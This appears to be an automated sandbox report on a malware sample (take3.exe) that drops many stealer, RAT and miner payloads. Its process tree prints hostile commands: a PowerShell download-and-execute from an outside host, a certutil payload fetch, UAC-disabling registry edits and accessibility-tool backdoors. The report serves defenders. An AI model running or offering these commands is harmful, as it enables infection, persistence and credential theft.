Malware Analysis Report

2025-01-23 11:51

Sample ID 241129-j89bpsvnes
Target take3.exe
SHA256 c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags
pyinstaller ammyyadmin flawedammyy gh0strat lumma metasploit quasar ramnit redline xmrig xworm diamotrix office04 sgvp backdoor banker credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer trojan upx vmprotect worm
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

Threat Level: Known bad

The file take3.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller ammyyadmin flawedammyy gh0strat lumma metasploit quasar ramnit redline xmrig xworm diamotrix office04 sgvp backdoor banker credential_access defense_evasion discovery evasion execution infostealer miner persistence privilege_escalation rat spyware stealer trojan upx vmprotect worm

Ramnit family

MetaSploit

Flawedammyy family

Ammyy Admin

RedLine payload

Redline family

Detect Xworm Payload

Lumma Stealer, LummaC

Ammyyadmin family

Xworm

Xworm family

FlawedAmmyy RAT

Quasar payload

Gh0strat family

Metasploit family

Gh0strat

Lumma family

Ramnit

RedLine

Xmrig family

AmmyyAdmin payload

Quasar family

xmrig

Gh0st RAT payload

Quasar RAT

XMRig Miner payload

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Sets file to hidden

Modifies Windows Firewall

Uses browser remote debugging

Executes dropped EXE

VMProtect packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

UPX packed file

Access Token Manipulation: Create Process with Token

Program crash

Detects Pyinstaller

Event Triggered Execution: Accessibility Features

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

System Location Discovery: System Language Discovery

System Network Configuration Discovery: Internet Connection Discovery

Unsigned PE

Runs ping.exe

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-29 08:21

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-29 08:21

Reported

2024-11-29 08:22

Platform

win11-20241007-en

Max time kernel

5s

Max time network

50s

Command Line

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Ramnit

trojan spyware stealer worm banker ramnit

Ramnit family

ramnit

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 2280 wrote to memory of 4592 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\AppData\Local\Temp\take3.exe
PID 4592 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4592 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4592 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe
PID 4592 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 4592 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 4592 wrote to memory of 1504 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe
PID 4592 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 4592 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 4592 wrote to memory of 4928 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe
PID 4592 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe
PID 4592 wrote to memory of 2964 N/A C:\Users\Admin\AppData\Local\Temp\take3.exe C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\AppData\Local\Temp\take3.exe

"C:\Users\Admin\AppData\Local\Temp\take3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe

"C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe"

C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe

"C:\Users\Admin\Downloads\UrlHausFiles\UpdateBrowserExt.exe"

C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe

"C:\Users\Admin\Downloads\UrlHausFiles\actualizacion-con-extension.exe"

C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe

"C:\Users\Admin\Downloads\UrlHausFiles\1_encoded.exe"

C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TORRENTOLD-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\payload.exe

"C:\Users\Admin\Downloads\UrlHausFiles\payload.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\7z.exe

"C:\Users\Admin\Downloads\UrlHausFiles\7z.exe"

C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe

"C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20ASM.NET.exe"

C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe

"C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe"

C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe

"C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe

"C:\Users\Admin\Downloads\UrlHausFiles\uxN4wDZ.exe"

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

"C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\Downloads\UrlHausFiles\LedgerUpdater.exe

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe"

C:\Windows\SysWOW64\PING.EXE

ping 2.2.2.2 -n 1 -w 3000

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe

"C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe"

C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Aa_v3.exe"

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

"C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe"

C:\Windows\system32\svchost.exe

"C:\Windows\system32\svchost.exe"

C:\Windows\system32\audiodg.exe

"C:\Windows\system32\audiodg.exe"

C:\Windows\system32\msiexec.exe

"C:\Windows\system32\msiexec.exe"

C:\Users\Admin\Downloads\UrlHausFiles\22.exe

"C:\Users\Admin\Downloads\UrlHausFiles\22.exe"

C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe"

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe" -service -lunch

C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ammyadmin.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\AD18.tmp\AD19.tmp\AD1A.bat C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe

"C:\Users\Admin\Downloads\UrlHausFiles\SGVP%20Client%20Users.exe"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE","goto :target","","runas",1)(window.close)

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

"C:\Users\Admin\Downloads\UrlHausFiles\key.exe"

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2080 -ip 2080

C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe

"C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE" goto :target

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2080 -s 396

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\BB70.tmp\BB71.tmp\BB72.bat C:\Users\Admin\Downloads\UrlHausFiles\av_downloader.exe"

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B8C1.tmp\B8C2.tmp\B8C3.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE goto :target"

C:\Windows\system32\mshta.exe

mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe

"C:\Users\Admin\Downloads\UrlHausFiles\ipscan221.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff81b4cc40,0x7fff81b4cc4c,0x7fff81b4cc58

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE

"C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE" goto :target

C:\Users\Admin\AppData\Local\Temp\C18B.tmp.x.exe

"C:\Users\Admin\AppData\Local\Temp\C18B.tmp.x.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C4A8.tmp\C4A9.tmp\C4AA.bat C:\Users\Admin\DOWNLO~1\URLHAU~1\AV_DOW~1.EXE goto :target"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1824,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1820 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2096,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2104 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2188,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2488 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe

"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3040,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3096 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3048,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:1

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4496 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4648 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe

"C:\Users\Admin\AppData\Local\Temp\D92B.tmp.zx.exe"

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\UrlHausFiles\cmd.cmd" "

C:\Windows\system32\attrib.exe

attrib +s +h e:\net

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4844,i,10250942246721249886,9917512175385544120,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8

C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe

"C:\Users\Admin\Downloads\UrlHausFiles\svchost.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\system32\certutil.exe

certutil -urlcache -split -f http://206.217.142.166:1234/windows/dr/dr.bat e:\net\dr\dr.bat

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fff81223cb8,0x7fff81223cc8,0x7fff81223cd8

C:\Windows\system32\reg.exe

reg query HKEY_CLASSES_ROOT\http\shell\open\command

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Windows\system32\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d "C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2012 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2444 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2000,2441838263140208318,12544329789927902751,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

